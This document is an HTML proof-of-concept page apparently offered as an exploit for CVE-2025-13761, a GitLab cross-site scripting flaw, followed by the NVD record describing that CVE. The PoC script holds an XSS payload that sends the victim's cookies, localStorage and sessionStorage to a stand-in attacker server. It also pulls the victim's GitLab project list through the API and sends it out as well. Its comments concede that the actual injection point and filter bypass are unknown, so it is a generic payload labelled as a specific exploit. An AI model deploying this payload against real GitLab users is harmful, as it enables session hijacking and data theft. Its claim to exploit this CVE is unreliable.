CVE-2025-13761

<!-- CVE-2025-13761 PoC - GitLab XSS to RCE --> <!-- This PoC demonstrates the XSS vulnerability that can lead to RCE in authenticated user's browser --> <!DOCTYPE html> <html> <head> <title>CVE-2025-13761 PoC</title> </head> <body> <h1>GitLab XSS -> Browser RCE PoC</h1> <script> // Attacker-controlled server to receive stolen credentials const ATTACKER_SERVER = "http://attacker.example.com/exfiltrate"; // Malicious payload that exploits the XSS const xssPayload = ` <script> // Steal GitLab session tokens fetch('${ATTACKER_SERVER}', { method: 'POST', mode: 'no-cors', body: JSON.stringify({ cookies: document.cookie, localStorage: localStorage, sessionStorage: sessionStorage }) }); // If possible, execute commands via GitLab API // This requires understanding the specific XSS vector // The actual exploitation depends on where the XSS is triggered // Example: Make API calls as the authenticated user fetch('/api/v4/projects?membership=true') .then(r => r.json()) .then(data => { // Exfiltrate project data fetch('${ATTACKER_SERVER}', { method: 'POST', body: JSON.stringify({projects: data}) }); }); </script> `; // Social engineering component - redirect to vulnerable endpoint function triggerExploit() { // The actual XSS would be triggered when GitLab renders unsanitized input // This could be via: // 1. Issue descriptions // 2. Merge request comments // 3. Wiki pages // 4. Snippet content // 5. User profile fields // For demonstration, this simulates the attack flow console.log('XSS Payload:', xssPayload); console.log('In a real attack, this would be injected into a GitLab field'); console.log('When a victim views the page, the script executes in their browser context'); } // Auto-trigger on page load window.onload = triggerExploit; </script> <p>Note: This is a demonstration of the attack concept. The actual exploitation requires:</p> <ul> <li>Identifying the specific injection point in GitLab</li> <li>Crafting a payload that bypasses GitLab's filters</li> <li>Social engineering to get the victim to visit the page</li> <li>An attacker-controlled server to receive exfiltrated data</li> </ul> </body> </html>

{"cve": {"id": "CVE-2025-13761", "sourceIdentifier": "[email protected]", "published": "2026-01-09T10:15:45.280", "lastModified": "2026-01-22T17:26:37.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an unauthenticated user to execute arbitrary code in the context of an authenticated user's browser by convincing the legitimate user to visit a specially crafted webpage."}, {"lang": "es", "value": "GitLab ha remediado un problema en GitLab CE/EE que afectaba a todas las versiones desde la 18.6 antes de la 18.6.3, y la 18.7 antes de la 18.7.1 que podría haber permitido a un usuario no autenticado ejecutar código arbitrario en el contexto del navegador de un usuario autenticado al convencer al usuario legítimo de visitar una página web especialmente diseñada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.3", "matchCriteriaId": "2B9B2E1D-016E-45CF-80CD-7CC77A5B5576"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.3", "matchCriteriaId": "75013646-70F2-467E-B79E-9301338AB853"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:community:*:*:*", "matchCriteriaId": "D5EB2CAA-6B1C-4780-B872-82947A098FED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "9B955F55-086B-4EDF-A9E6-5B9E68600494"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/582237", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3441368", "source": "[email protected]", "tags": ["Permissions Required"]}]}}